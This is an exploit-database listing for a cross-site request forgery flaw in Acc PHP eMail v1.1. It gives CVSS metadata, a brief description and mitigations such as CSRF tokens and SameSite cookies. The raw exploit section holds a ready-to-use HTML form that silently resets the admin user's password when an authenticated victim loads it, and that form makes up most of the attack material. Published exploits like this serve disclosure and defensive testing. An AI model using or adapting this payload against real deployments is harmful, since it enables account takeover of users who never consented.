header-logo
Suggest Exploit
vendor:
Acc PHP eMail
by:
bi0
8.8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Acc PHP eMail
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Acc PHP eMail v1.1 – [ CSRF ]

Acc PHP eMail v1.1 is vulnerable to Cross-Site Request Forgery (CSRF). An attacker can craft a malicious HTML page that when visited by an authenticated user, can change the password of the user. The malicious HTML page contains a form with hidden fields that when submitted, can change the password of the user.

Mitigation:

Implementing CSRF protection tokens, validating the HTTP Referer header, and using SameSite cookie attribute can help mitigate CSRF attacks.
Source

Exploit-DB raw data:

               ______     __     ______
               /\  == \   /\ \   /\  __ \
               \ \  __<   \ \ \  \ \ \/\ \
                \ \_____\  \ \_\  \ \_____\
                 \/_____/   \/_/   \/_____/

                 01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [+] Acc PHP eMail v1.1 - [ CSRF ]
#
#  // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: packetdeath,,Zer0flag,redking and ssteam.ws ...
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
#  It Changes the password
#
#  http://localhost/mailinglist/index.php
#
# // Start CSRF
# <html>
# <form action="http://localhost/mailinglist/demo/index.php" method="POST">
# <input type="hidden" name="action" value="change">
# <input type="hidden" name="id" value="1">
# <input type="hidden" id="text" name="user" value="admin">
# <input type="password"  name="password" value="pass">
# <input type="password"  name="password1" value="pass">
# <input type="hidden" name="action" value="change1">
# <input type="submit" name="login" value="Modify">
# </form>
# </html>
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]

#EOF

Navigation

Suggest Exploit

Services By CQR